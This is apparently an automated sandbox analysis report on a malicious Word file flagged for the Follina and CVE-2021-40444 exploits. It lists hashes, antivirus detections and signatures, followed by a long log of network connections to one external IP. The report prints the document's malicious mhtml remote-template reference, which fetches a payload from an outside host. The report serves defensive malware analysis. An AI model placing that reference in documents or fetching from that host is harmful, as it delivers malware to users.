Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Sample Name:	nnxPt0Yydv.doc
Analysis ID:	696518
MD5:	15b691f0c5d627e71fed8a5d34fb0328
SHA1:	1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:	3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Tags:	CVE-2022-30190docFollina
Infos:

Detection

CVE-2021-40444

Score:	68
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Detected CVE-2021-40444 exploit

Contains an external reference to another file

Yara signature match

Potential document exploit detected (unknown TCP traffic)

Uses a known web browser user agent for HTTP communication

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Uses insecure TLS / SSL version for HTTPS connection

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nnxPt0Yydv.doc

Avira: detected

Multi AV Scanner detection for submitted file

Source: nnxPt0Yydv.doc	ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc	Virustotal: Detection: 48%			Perma Link

Exploits

Detected CVE-2021-40444 exploit

Source: document.xml.rels

Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49173
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49174
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49175 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49175
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49176 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49176
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49177 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49177
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49178 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49178
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49179 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49179
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49180 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49180
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49181 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49181
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49182
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49182 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49183
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49183 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49184 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49184
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49185 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49185
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49186 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49186
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49187 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49187
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49188 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49188
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
Source: global traffic	TCP traffic: 82.202.173.45:443 -> 192.168.2.22:49189
Source: global traffic	TCP traffic: 192.168.2.22:49189 -> 82.202.173.45:443
